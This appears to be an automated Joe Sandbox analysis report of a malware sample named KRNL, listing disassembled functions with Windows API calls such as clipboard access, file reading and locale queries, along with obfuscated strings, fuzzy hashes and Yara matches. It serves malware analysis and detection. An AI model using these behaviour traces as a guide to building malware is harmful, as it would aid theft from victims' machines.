                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 9$&Kt0$0b$45$<$>>$AQ$PR$Vq$Vq$XH$Ys$\\$_p$bo$ef$mm$rl$wY$|i$|s
                                                                                                                                                                                                                                                          • API String ID: 0-1097330926
                                                                                                                                                                                                                                                          • Opcode ID: a1f94b11949275e8069bc20abe81d2010a5b2d7f4bf8cf5f9cf8c986fdad36b1
                                                                                                                                                                                                                                                          • Instruction ID: b07e6adf7c7580e31f81f34cb8ad9f597e7046c3fe9383923d964ddd8e2be701
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1f94b11949275e8069bc20abe81d2010a5b2d7f4bf8cf5f9cf8c986fdad36b1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E7262B8D0526A9BDB60DF59DC883CDBB71FF95304F108AE9C4596B250DB380A81CF86
                                                                                                                                                                                                                                                          Function 00424060 Relevance: 37.3, APIs: 1, Strings: 20, Instructions: 581COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 9$&Kt0$45$<$>>$AQ$PR$Vq$Vq$XH$Ys$\\$_p$bo$ef$mm$rl$wY$|i$|s
                                                                                                                                                                                                                                                          • API String ID: 0-3538275056
                                                                                                                                                                                                                                                          • Opcode ID: ff1fe25e9e673a135530696f1c2e179ad14c71c8b1183f928a20b5e979637931
                                                                                                                                                                                                                                                          • Instruction ID: c58b3c97d3732406a86a154fa40332ade82447cee3a4b8ffceeb85e0bc4811b8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff1fe25e9e673a135530696f1c2e179ad14c71c8b1183f928a20b5e979637931
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C6243B99052699BDB60DF19DC883CDBB71FFA5304F108AE9C4593B250DB384A81CF86
                                                                                                                                                                                                                                                          Function 004177AD Relevance: 25.3, APIs: 3, Strings: 11, Instructions: 788COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "f&f$)fvf$,ZA$,f4f$21$=f!f$=f(f$Jc1t$Jc1t$Pf6f${fGf
                                                                                                                                                                                                                                                          • API String ID: 0-710588756
                                                                                                                                                                                                                                                          • Opcode ID: d5eefe01124a04aaecba9110486d758d660dffb09e16bdc73fa1e38b142bf8cb
                                                                                                                                                                                                                                                          • Instruction ID: ab1276890b7e4d60ac31e8d7f5af75c5f57bb126c4e48dcd0f14b83392fd953b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5eefe01124a04aaecba9110486d758d660dffb09e16bdc73fa1e38b142bf8cb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3742F3765083118BD724CF25C8907ABB7F1EFC9314F15892EE8C997361EB389991CB4A
                                                                                                                                                                                                                                                          Function 00420A20 Relevance: 16.7, Strings: 13, Instructions: 419COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: #3#3$#3=3$'3!3$*$83F3$83R3$93=3$:3 3$J3L3$O30$d3f3$i3_3$k3l3
                                                                                                                                                                                                                                                          • API String ID: 0-1612148737
                                                                                                                                                                                                                                                          • Opcode ID: 9399a7ee9c6e5426ff3ceaea5b5b42d51cd07c97ddf9252c8df36100a12064cf
                                                                                                                                                                                                                                                          • Instruction ID: d8fb8020a3cc6f2a77e7ef34e68e444773c6829ddc0a3ffcdc26604336b8212f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9399a7ee9c6e5426ff3ceaea5b5b42d51cd07c97ddf9252c8df36100a12064cf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89B126B16183208BC724DF18C85266BB7F1FFD1354F588A1DE4828F3A1E7789844CB96
                                                                                                                                                                                                                                                          Function 004285E1 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 300COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042860A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                          • String ID: J$,J^J$bJSJ$cJwJ$rJnJ$tJdJ$wJbJ
                                                                                                                                                                                                                                                          • API String ID: 237503144-492521606
                                                                                                                                                                                                                                                          • Opcode ID: 973a2b58bd6d7435bac51cb8ee912dccf8309705b16b7e8cff55539545f2cee1
                                                                                                                                                                                                                                                          • Instruction ID: dfef59bcc1acdaadf563c9da893a7df5761e8c79a35e082c28548025607413e8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 973a2b58bd6d7435bac51cb8ee912dccf8309705b16b7e8cff55539545f2cee1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54A1E2729083128BD714CF54D4506AFB3F1FFC1344F45892DE999AB350EB789945CB8A
                                                                                                                                                                                                                                                          Function 00428A4D Relevance: 11.6, Strings: 9, Instructions: 394COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: J$,J^J$Uqmq$bJSJ$cJwJ$oq|q$rJnJ$tJdJ$wJbJ
                                                                                                                                                                                                                                                          • API String ID: 0-594100160
                                                                                                                                                                                                                                                          • Opcode ID: 99ed429220cc6030d532777ece67301cdc2336b41890651687883faee18324cc
                                                                                                                                                                                                                                                          • Instruction ID: ace79c1ac5836ebcc237f59b1b0d0662a53369457569fb5ab3995258eec696b1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99ed429220cc6030d532777ece67301cdc2336b41890651687883faee18324cc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFC10EB1A083118BC714DF55D86166BB3F2FFC2354F04892DE8858B3A4FB78A954CB5A
                                                                                                                                                                                                                                                          Function 00701287 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 182COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: GetLastError.KERNEL32(00000000,?,006FE58D), ref: 006FC16E
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000,?,?,00000028,006F8363), ref: 006FC210
                                                                                                                                                                                                                                                          • GetUserDefaultLCID.KERNEL32 ref: 0070138F
                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 007013CD
                                                                                                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 007013E0
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00701428
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00701443
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                          • String ID: ,Kq
                                                                                                                                                                                                                                                          • API String ID: 415426439-4204376562
                                                                                                                                                                                                                                                          • Opcode ID: de4140eb7039f8ae0cec745fc4d8360b22ca94e559da4a405fbfbf9fc03ac882
                                                                                                                                                                                                                                                          • Instruction ID: 8742ae4081815cfe086529e807c8d4fe040462c643a15d035f11897888423dd3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de4140eb7039f8ae0cec745fc4d8360b22ca94e559da4a405fbfbf9fc03ac882
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06514EB1A00209EBDB10DFA5DC45ABEB7F8BF45700F958669F901E71D0E7789A408B61
                                                                                                                                                                                                                                                          Function 004322E0 Relevance: 9.1, APIs: 6, Instructions: 104clipboardCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Clipboard$CloseDataGlobalLockOpen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1494355150-0
                                                                                                                                                                                                                                                          • Opcode ID: 11cf1c11e8cbcabd11fca72055923e1be0a33eac30008c65e1172c4418063db5
                                                                                                                                                                                                                                                          • Instruction ID: 7b7471ec2985e3dad10513ed9157fb99150564327386af1641d632e56db34497
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11cf1c11e8cbcabd11fca72055923e1be0a33eac30008c65e1172c4418063db5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 993159B150C3118FD300AF79968536FBBE0AF99314F51283EE8C686211D6BD898A975B
                                                                                                                                                                                                                                                          Function 00701A07 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,007013BD,?,00000000), ref: 00701AA0
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,007013BD,?,00000000), ref: 00701AC9
                                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,?,007013BD,?,00000000), ref: 00701ADE
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                          • Opcode ID: c5571135d027d6747782e181728e057ce2e3614bac7e1ea0d3e9794a7d1657ad
                                                                                                                                                                                                                                                          • Instruction ID: 3caf728f46d057cb60f71af56788e373c4dbfaf0e9ebf429d7a3d06cf04c9499
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5571135d027d6747782e181728e057ce2e3614bac7e1ea0d3e9794a7d1657ad
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 112186A2B02100EADB34CF58C900AD772EAEB54B54BD6C664E90AD7184F73ADD40C390
                                                                                                                                                                                                                                                          Function 0040DA8B Relevance: 7.8, Strings: 6, Instructions: 257COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 6""$D$d"P"$p"F"$""$""
                                                                                                                                                                                                                                                          • API String ID: 0-1382292853
                                                                                                                                                                                                                                                          • Opcode ID: abc874c9909978c4c67d63b3286c9fd06b2b4f2b84e92e02f925d395bc13f45d
                                                                                                                                                                                                                                                          • Instruction ID: 7334df959159416c48e382d616d244ce160e02f9129f40ab737ecec1edd4b52a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abc874c9909978c4c67d63b3286c9fd06b2b4f2b84e92e02f925d395bc13f45d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70B1E3B04083829BE728CF81C69576BBBF1FF85748F105A8DE5951B290D3F98648DF86
                                                                                                                                                                                                                                                          Function 00425770 Relevance: 7.7, Strings: 6, Instructions: 226COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: M2x2$c2o2$m2?2$o2x2$u202$}2q2
                                                                                                                                                                                                                                                          • API String ID: 0-1290146539
                                                                                                                                                                                                                                                          • Opcode ID: 9de3aaf11f0e2ee482b38c0393ecb77c9407e30e746739f3fde1d6b151a35207
                                                                                                                                                                                                                                                          • Instruction ID: 3246baa6c9dc81b657b25537a01d6a69c66a68c26ad81c28aa9a33eac08b7532
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9de3aaf11f0e2ee482b38c0393ecb77c9407e30e746739f3fde1d6b151a35207
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 176142B1A08760DBD320DF15D98166BB7F1FFC1314F48892EE8855B394E7B98904CB8A
                                                                                                                                                                                                                                                          Function 006E1FB0 Relevance: 7.7, APIs: 5, Instructions: 200fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006E1240: _strlen.LIBCMT ref: 006E12BA
                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 006E2046
                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006E206B
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 006E207A
                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 006E20CD
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 006E21FD
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseFileHandle_strlen$ReadSize
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1490117831-0
                                                                                                                                                                                                                                                          • Opcode ID: 535cfde92e1cd479d70663943f00d6632f5ae711a3e6a98b1ab7c1061b4646bc
                                                                                                                                                                                                                                                          • Instruction ID: 7d82d5c2f4889cd71774557edc6e1056f3f457f206df0b3871306cfa55cc606e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 535cfde92e1cd479d70663943f00d6632f5ae711a3e6a98b1ab7c1061b4646bc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A171D2B2C013498FCB10DFA5DC44BEEBBB6BF49310F144628E914A7391E735AA45CBA5
                                                                                                                                                                                                                                                          Function 00426990 Relevance: 7.6, Strings: 6, Instructions: 104COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: %M)M$)M-M$-M M$4M:M$>M5M$MM
                                                                                                                                                                                                                                                          • API String ID: 0-1618744259
                                                                                                                                                                                                                                                          • Opcode ID: 26d9f920b7d13b0cf1986f7dc4a40b8815e4dcf4f67e7bb9ab91444ec8e3532c
                                                                                                                                                                                                                                                          • Instruction ID: 78049ae23b19002676e268f95cda996eb32204798bfd1804e00c4afc25085f20
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26d9f920b7d13b0cf1986f7dc4a40b8815e4dcf4f67e7bb9ab91444ec8e3532c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3441BCB061D3948AD3249F24E841BABBBB5FF81318F46482DE4C89B315E73A8445CF5B
                                                                                                                                                                                                                                                          Function 00419930 Relevance: 6.8, APIs: 2, Strings: 1, Instructions: 1513COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 0043CD20: LdrInitializeThunk.NTDLL(00423382,00000002,00000014,000000FF,00000000,?,00000002,?), ref: 0043CD4E
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0041A030
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0041A0CE
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                                          • String ID: Fn@n
                                                                                                                                                                                                                                                          • API String ID: 764372645-2265005453
                                                                                                                                                                                                                                                          • Opcode ID: 2d1d47e55f584641a642691e4c6c39e2cddd0be4ead511b4d778223cc5cbb54d
                                                                                                                                                                                                                                                          • Instruction ID: 131018062a82d736fa47d298312175603f5847d79bc8a07e9cfe404f1bf231df
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d1d47e55f584641a642691e4c6c39e2cddd0be4ead511b4d778223cc5cbb54d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CA223766093009FD720CF24C8807ABB7E2BFD4314F19482EE9C597351D7BAAD95878A
                                                                                                                                                                                                                                                          Function 004190D1 Relevance: 6.5, Strings: 5, Instructions: 291COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 7S>S$FS;S$LSES$MR$SS
                                                                                                                                                                                                                                                          • API String ID: 0-2954923458
                                                                                                                                                                                                                                                          • Opcode ID: 131d57b7fd51426a8d0001431d9d1c9b01e9004daf9e3171a99284bc05a8c828
                                                                                                                                                                                                                                                          • Instruction ID: c7628366159036e009891614648824bad52e0519bc3dd4501f1445c0c89d208f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 131d57b7fd51426a8d0001431d9d1c9b01e9004daf9e3171a99284bc05a8c828
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0B15AB19093918BD3318F15C4A07EBF7A2AF86705F54992DD4C99B350EBB84982CB86
                                                                                                                                                                                                                                                          Function 006F9CC0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                                                                                                                                          • Instruction ID: 24fc032901f1b22d41496aaac67efc380e69dd7f29fb06294d7f9bb03791442a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8022CB1E012199BDF14CFA8D880BEEB7B2FF49314F258269D619E7341D731AA41CB94
                                                                                                                                                                                                                                                          Function 00701FE9 Relevance: 6.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007020D9
                                                                                                                                                                                                                                                          Memory Dump Source
